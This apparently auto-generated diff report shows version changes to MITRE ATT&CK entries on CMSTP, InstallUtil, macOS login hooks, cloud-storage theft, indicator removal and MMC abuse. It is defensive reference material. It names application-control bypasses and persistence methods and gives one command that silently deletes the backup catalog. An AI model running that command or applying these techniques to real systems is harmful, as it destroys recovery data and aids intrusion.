>ry commands from a malicious INF through an auto-elevated CO>e arbitrary commands from a malicious INF through an auto-el
>M interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: >evated COM interface. (Citation: MSitPros CMSTP Aug 2017) (C
>GitHub Ultimate AppLocker Bypass List) (Citation: Endurant C>itation: GitHub Ultimate AppLocker Bypass List) (Citation: E
>MSTP July 2018)>ndurant CMSTP July 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:34:03.247000+00:002022-03-11 18:38:36.109000+00:00
descriptionAdversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1218.001] System Binary Proxy Execution: Compiled HTML File

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:32:24.589000+00:002022-03-11 18:59:36.836000+00:00
x_mitre_data_sources[1]File: File CreationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionFile: File Creation
x_mitre_version1.02.0

[T1218.002] System Binary Proxy Execution: Control Panel

Current version: 2.0

Version changed from: 1.1 → 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 18:37:11.672000+00:002022-03-11 19:01:55.821000+00:00
x_mitre_data_sources[0]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[1]File: File CreationCommand: Command Execution
x_mitre_data_sources[2]Module: Module LoadWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[3]Process: OS API ExecutionProcess: Process Creation
x_mitre_data_sources[4]Command: Command ExecutionModule: Module Load
x_mitre_data_sources[5]Windows Registry: Windows Registry Key ModificationFile: File Creation
x_mitre_version1.12.0

[T1530] Data from Cloud Storage

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may access data objects from improperly secured t1Adversaries may access data from improperly secured cloud st
>cloud storage.  Many cloud service providers offer solutions>orage.  Many cloud service providers offer solutions for onl
> for online data storage such as Amazon S3, Azure Storage, a>ine data object storage such as Amazon S3, Azure Storage, an
>nd Google Cloud Storage. These solutions differ from other s>d Google Cloud Storage. These solutions differ from other st
>torage solutions (such as SQL or Elasticsearch) in that ther>orage solutions (such as SQL or Elasticsearch) in that there
>e is no overarching application. Data from these solutions c> is no overarching application. Data from these solutions ca
>an be retrieved directly using the cloud provider's APIs. So>n be retrieved directly using the cloud provider's APIs.   I
>lution providers typically offer security guides to help end>n other cases, SaaS application providers such as Slack, Con
> users configure systems.(Citation: Amazon S3 Security, 2019>fluence, and Salesforce also provide cloud storage solutions
>)(Citation: Microsoft Azure Storage Security, 2019)(Citation> as a peripheral use case of their platform. These cloud obj
>: Google Cloud Storage Best Practices, 2019)  Misconfigurati>ects can be extracted directly from their associated applica
>on by end users is a common problem. There have been numerou>tion.(Citation: EA Hacked via Slack - June 2021)(Citation: S
>s incidents where cloud storage has been improperly secured >ecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Ci
>(typically by unintentionally allowing public access by unau>tation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(
>thenticated users or overly-broad access by all users), allo>Citation: Dark Clouds_Usenix_Mulazzani_08_2011)  Adversaries
>wing open access to credit cards, personally identifiable in> may collect sensitive data from these cloud storage solutio
>formation, medical records, and other sensitive information.>ns. Providers typically offer security guides to help end us
>(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired>ers configure systems, though misconfigurations are a common
> Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breac> problem.(Citation: Amazon S3 Security, 2019)(Citation: Micr
>h, 2017) Adversaries may also obtain leaked credentials in s>osoft Azure Storage Security, 2019)(Citation: Google Cloud S
>ource repositories, logs, or other means as a way to gain ac>torage Best Practices, 2019) There have been numerous incide
>cess to cloud storage objects that have access permission co>nts where cloud storage has been improperly secured, typical
>ntrols.>ly by unintentionally allowing public access to unauthentica
 >ted users, overly-broad access by all users, or even access 
 >for any anonymous person outside the control of the Identity
 > Access Management system without even needing basic user pe
 >rmissions.  This open access may expose various types of sen
 >sitive data, such as credit cards, personally identifiable i
 >nformation, or medical records.(Citation: Trend Micro S3 Exp
 >osed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(C
 >itation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-meg
 >a-extortion_05_2021)  Adversaries may also obtain then abuse
 > leaked credentials from source repositories, logs, or other
 > means as a way to gain access to cloud storage objects.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:01.374000+00:002022-10-18 19:10:42.621000+00:00
nameData from Cloud Storage ObjectData from Cloud Storage
descriptionAdversaries may access data objects from improperly secured cloud storage. Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.Adversaries may access data from improperly secured cloud storage. Many cloud service providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. In other cases, SaaS application providers such as Slack, Confluence, and Salesforce also provide cloud storage solutions as a peripheral use case of their platform. These cloud objects can be extracted directly from their associated application.(Citation: EA Hacked via Slack - June 2021)(Citation: SecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Citation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(Citation: Dark Clouds_Usenix_Mulazzani_08_2011) Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions. This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021) Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.
external_references[1]['source_name']Amazon S3 Security, 2019SecureWorld - How Secure Is Your Slack Channel - Dec 2021
external_references[1]['description']Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019. Drew Todd. (2021, December 28). How Secure Is Your Slack Channel?. Retrieved May 31, 2022.
external_references[1]['url']https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/https://www.secureworld.io/industry-news/how-secure-is-your-slack-channel#:~:text=Electronic%20Arts%20hacked%20through%20Slack%20channel&text=In%20total%2C%20the%20hackers%20claim,credentials%20over%20a%20Slack%20channel.
external_references[2]['source_name']Microsoft Azure Storage Security, 2019Amazon S3 Security, 2019
external_references[2]['description']Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019.
external_references[2]['url']https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guidehttps://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/
external_references[3]['source_name']Google Cloud Storage Best Practices, 2019Microsoft Azure Storage Security, 2019
external_references[3]['description']Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.
external_references[3]['url']https://cloud.google.com/storage/docs/best-practiceshttps://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
external_references[4]['source_name']Trend Micro S3 Exposed PII, 2017EA Hacked via Slack - June 2021
external_references[4]['description']Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.Anthony Spadafora. (2021, June 11). EA hack reportedly used stolen cookies and Slack to target gaming giant. Retrieved May 31, 2022.
external_references[4]['url']https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australiahttps://www.techradar.com/news/ea-hack-reportedly-used-stolen-cookies-and-slack-to-hack-gaming-giant
external_references[6]['source_name']HIPAA Journal S3 Breach, 2017Google Cloud Storage Best Practices, 2019
external_references[6]['description']HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.
external_references[6]['url']https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/https://cloud.google.com/storage/docs/best-practices
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'HackerNews - 3 SaaS App Cyber Attacks - April 2022', 'description': 'Hananel Livneh. (2022, April 7). Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022. Retrieved May 31, 2022.', 'url': 'https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html'}
external_references{'source_name': 'HIPAA Journal S3 Breach, 2017', 'description': 'HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.', 'url': 'https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/'}
external_references{'source_name': 'Rclone-mega-extortion_05_2021', 'description': 'Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.', 'url': 'https://redcanary.com/blog/rclone-mega-extortion/'}
external_references{'source_name': 'Dark Clouds_Usenix_Mulazzani_08_2011', 'description': 'Martin Mulazzani, Sebastian Schrittwieser, Manuel Leithner, Markus Huber, and Edgar Weippl. (2011, August). Dark Clouds on the Horizon: Using Cloud Storage as Attack Vector and Online Slack Space. Retrieved July 14, 2022.', 'url': 'https://www.usenix.org/conference/usenix-security-11/dark-clouds-horizon-using-cloud-storage-attack-vector-and-online-slack'}
external_references{'source_name': 'Trend Micro S3 Exposed PII, 2017', 'description': 'Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.', 'url': 'https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia'}
x_mitre_contributorsAppOmni
x_mitre_platformsSaaS

[T1048.003] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Current version: 2.0

Version changed from: 1.1 → 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 22:49:28.421000+00:002022-04-12 19:57:45.277000+00:00
nameExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolExfiltration Over Unencrypted Non-C2 Protocol
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content

[T1070] Indicator Removal

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1Adversaries may delete or alter generated artifacts on a host1Adversaries may delete or modify artifacts generated within 
>t system, including logs or captured files such as quarantin>systems to remove evidence of their presence or hinder defen
>ed malware. Locations and format of logs are platform or pro>ses. Various artifacts may be created by an adversary or som
>duct-specific, however standard operating system logs are ca>ething that can be attributed to an adversary’s actions. Typ
>ptured as Windows events or Linux/macOS files such as [Bash >ically these artifacts are used as defensive indicators rela
>History](https://attack.mitre.org/techniques/T1552/003) and >ted to monitored events, such as strings from downloaded fil
>/var/log/*.  These actions may interfere with event collecti>es, logs that are generated from user actions, and other dat
>on, reporting, or other notifications used to detect intrusi>a analyzed by defenders. Location, format, and type of artif
>on activity. This may compromise the integrity of security s>act (such as command or login history) are often specific to
>olutions by causing notable events to go unreported. This ac> each platform.  Removal of these indicators may interfere w
>tivity may also impede forensic analysis and incident respon>ith event collection, reporting, or other processes used to 
>se, due to lack of sufficient data to determine what occurre>detect intrusion activity. This may compromise the integrity
>d.> of security solutions by causing notable events to go unrep
 >orted. This activity may also impede forensic analysis and i
 >ncident response, due to lack of sufficient data to determin
 >e what occurred.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-07-27 15:23:52.099000+00:002022-10-21 16:12:54.457000+00:00
nameIndicator Removal on HostIndicator Removal
descriptionAdversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform. Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
x_mitre_data_sources[1]File: File DeletionScheduled Job: Scheduled Job Modification
x_mitre_data_sources[2]File: File ModificationUser Account: User Account Authentication
x_mitre_data_sources[3]Windows Registry: Windows Registry Key ModificationWindows Registry: Windows Registry Key Deletion
x_mitre_data_sources[4]Windows Registry: Windows Registry Key DeletionNetwork Traffic: Network Traffic Content
x_mitre_data_sources[6]Command: Command ExecutionFile: File Metadata
x_mitre_data_sources[7]Network Traffic: Network Traffic ContentFirewall: Firewall Rule Modification
x_mitre_data_sources[8]User Account: User Account AuthenticationCommand: Command Execution
x_mitre_data_sources[9]File: File MetadataWindows Registry: Windows Registry Key Modification
x_mitre_version1.22.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsBlake Strom, Microsoft 365 Defender
x_mitre_data_sourcesFile: File Deletion
x_mitre_data_sourcesFile: File Modification
x_mitre_platformsNetwork
x_mitre_platformsOffice 365
x_mitre_platformsGoogle Workspace

[T1218.004] System Binary Proxy Execution: InstallUtil

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may use InstallUtil to proxy execution of code tt1Adversaries may use InstallUtil to proxy execution of code t
>hrough a trusted Windows utility. InstallUtil is a command-l>hrough a trusted Windows utility. InstallUtil is a command-l
>ine utility that allows for installation and uninstallation >ine utility that allows for installation and uninstallation 
>of resources by executing specific installer components spec>of resources by executing specific installer components spec
>ified in .NET binaries. (Citation: MSDN InstallUtil) Install>ified in .NET binaries. (Citation: MSDN InstallUtil) The Ins
>Util is digitally signed by Microsoft and located in the .NE>tallUtil binary may also be digitally signed by Microsoft an
>T directories on a Windows system: <code>C:\Windows\Microsof>d located in the .NET directories on a Windows system: <code
>t.NET\Framework\v<version>\InstallUtil.exe</code> and <code>>>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.e
>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.>xe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<v
>exe</code>.  InstallUtil may also be used to bypass applicat>ersion>\InstallUtil.exe</code>.  InstallUtil may also be use
>ion control through use of attributes within the binary that>d to bypass application control through use of attributes wi
> execute the class decorated with the attribute <code>[Syste>thin the binary that execute the class decorated with the at
>m.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLB>tribute <code>[System.ComponentModel.RunInstaller(true)]</co
>AS Installutil)>de>. (Citation: LOLBAS Installutil)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:34:46.529000+00:002022-03-11 18:47:52.603000+00:00
descriptionAdversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe. InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe. InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.02.0

[T1037.002] Boot or Logon Initialization Scripts: Login Hook

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may use macOS logon scripts automatically executt1Adversaries may use a Login Hook to establish persistence ex
>ed at logon initialization to establish persistence. macOS a>ecuted upon user logon. A login hook is a plist file that po
>llows logon scripts (known as login hooks) to be executed wh>ints to a specific script to execute with root privileges up
>enever a specific user logs into a system. A login hook tell>on user logon. The plist file is located in the <code>/Libra
>s Mac OS X to execute a certain script when a user logs in, >ry/Preferences/com.apple.loginwindow.plist</code> file and c
>but unlike [Startup Items](https://attack.mitre.org/techniqu>an be modified using the <code>defaults</code> command-line 
>es/T1037/005), a login hook executes as the elevated root us>utility. This behavior is the same for logout hooks where a 
>er.(Citation: creating login hook)  Adversaries may use thes>script can be executed upon user logout. All hooks require a
>e login hooks to maintain persistence on a single system.(Ci>dministrator permissions to modify or create hooks.(Citation
>tation: S1 macOs Persistence) Access to login hook scripts m>: Login Scripts Apple Dev)(Citation: LoginWindowScripts Appl
>ay allow an adversary to insert additional malicious code. T>e Dev)   Adversaries can add or insert a path to a malicious
>here can only be one login hook at a time though and dependi> script in the <code>com.apple.loginwindow.plist</code> file
>ng on the access configuration of the hooks, either local cr>, using the <code>LoginHook</code> or <code>LogoutHook</code
>edentials or an administrator account may be necessary. >> key-value pair. The malicious script is executed upon the 
 >next user login. If a login hook already exists, adversaries
 > can add additional commands to an existing login hook. Ther
 >e can be only one login and logout hook on a system at a tim
 >e.(Citation: S1 macOs Persistence)(Citation: Wardle Persiste
 >nce Chapter)  **Note:** Login hooks were deprecated in 10.11
 > version of macOS in favor of [Launch Daemon](https://attack
 >.mitre.org/techniques/T1543/004) and [Launch Agent](https://
 >attack.mitre.org/techniques/T1543/001) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-27 16:49:15.786000+00:002022-04-20 16:42:05.094000+00:00
nameLogon Script (Mac)Login Hook
descriptionAdversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook) Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) Adversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter) **Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
external_references[1]['source_name']creating login hookLogin Scripts Apple Dev
external_references[1]['description']Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved July 17, 2017.Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022.
external_references[1]['url']https://support.apple.com/de-at/HT2420https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html
external_references[2]['source_name']S1 macOs PersistenceLoginWindowScripts Apple Dev
external_references[2]['description']Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.
external_references[2]['url']https://www.sentinelone.com/blog/how-malware-persists-on-macos/https://developer.apple.com/documentation/devicemanagement/loginwindowscripts
x_mitre_data_sources[0]File: File CreationProcess: Process Creation
x_mitre_data_sources[1]File: File ModificationCommand: Command Execution
x_mitre_data_sources[2]Process: Process CreationFile: File Creation
x_mitre_data_sources[3]Command: Command ExecutionFile: File Modification
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Wardle Persistence Chapter', 'description': 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.', 'url': 'https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf'}
external_references{'source_name': 'S1 macOs Persistence', 'description': 'Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.', 'url': 'https://www.sentinelone.com/blog/how-malware-persists-on-macos/'}

[T1218.014] System Binary Proxy Execution: MMC

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may abuse mmc.exe to proxy execution of maliciout1Adversaries may abuse mmc.exe to proxy execution of maliciou
>s .msc files. Microsoft Management Console, or MMC, is a sig>s .msc files. Microsoft Management Console (MMC) is a binary
>ned Windows binary and is used in several ways in either its> that may be signed by Microsoft and is used in several ways
> GUI or in a command prompt.(Citation: win_mmc)(Citation: wh> in either its GUI or in a command prompt.(Citation: win_mmc
>at_is_mmc) MMC can be used to create, open, and save custom >)(Citation: what_is_mmc) MMC can be used to create, open, an
>consoles that contain administrative tools created by Micros>d save custom consoles that contain administrative tools cre
>oft, called snap-ins. These snap-ins may be used to manage W>ated by Microsoft, called snap-ins. These snap-ins may be us
>indows systems locally or remotely. MMC can also be used to >ed to manage Windows systems locally or remotely. MMC can al
>open Microsoft created .msc files to manage system configura>so be used to open Microsoft created .msc files to manage sy
>tion.(Citation: win_msc_files_overview)  For example, <code>>stem configuration.(Citation: win_msc_files_overview)  For e
>mmc C:\Users\foo\admintools.msc /a</code> will open a custom>xample, <code>mmc C:\Users\foo\admintools.msc /a</code> will
>, saved console msc file in author mode.(Citation: win_mmc) > open a custom, saved console msc file in author mode.(Citat
>Another common example is <code>mmc gpedit.msc</code>, which>ion: win_mmc) Another common example is <code>mmc gpedit.msc
> will open the Group Policy Editor application window.   Adv></code>, which will open the Group Policy Editor application
>ersaries may use MMC commands to perform malicious tasks. Fo> window.   Adversaries may use MMC commands to perform malic
>r example, <code>mmc wbadmin.msc delete catalog -quiet</code>ious tasks. For example, <code>mmc wbadmin.msc delete catalo
>> deletes the backup catalog on the system (i.e. [Inhibit Sy>g -quiet</code> deletes the backup catalog on the system (i.
>stem Recovery](https://attack.mitre.org/techniques/T1490)) w>e. [Inhibit System Recovery](https://attack.mitre.org/techni
>ithout prompts to the user (Note: <code>wbadmin.msc</code> m>ques/T1490)) without prompts to the user (Note: <code>wbadmi
>ay only be present by default on Windows Server operating sy>n.msc</code> may only be present by default on Windows Serve
>stems).(Citation: win_wbadmin_delete_catalog)(Citation: phob>r operating systems).(Citation: win_wbadmin_delete_catalog)(
>os_virustotal)  Adversaries may also abuse MMC to execute ma>Citation: phobos_virustotal)  Adversaries may also abuse MMC
>licious .msc files. For example, adversaries may first creat> to execute malicious .msc files. For example, adversaries m
>e a malicious registry Class Identifier (CLSID) subkey, whic>ay first create a malicious registry Class Identifier (CLSID
>h uniquely identifies a [Component Object Model](https://att>) subkey, which uniquely identifies a [Component Object Mode
>ack.mitre.org/techniques/T1559/001) class object.(Citation: >l](https://attack.mitre.org/techniques/T1559/001) class obje
>win_clsid_key) Then, adversaries may create custom consoles >ct.(Citation: win_clsid_key) Then, adversaries may create cu
>with the “Link to Web Address” snap-in that is linked to the>stom consoles with the “Link to Web Address” snap-in that is
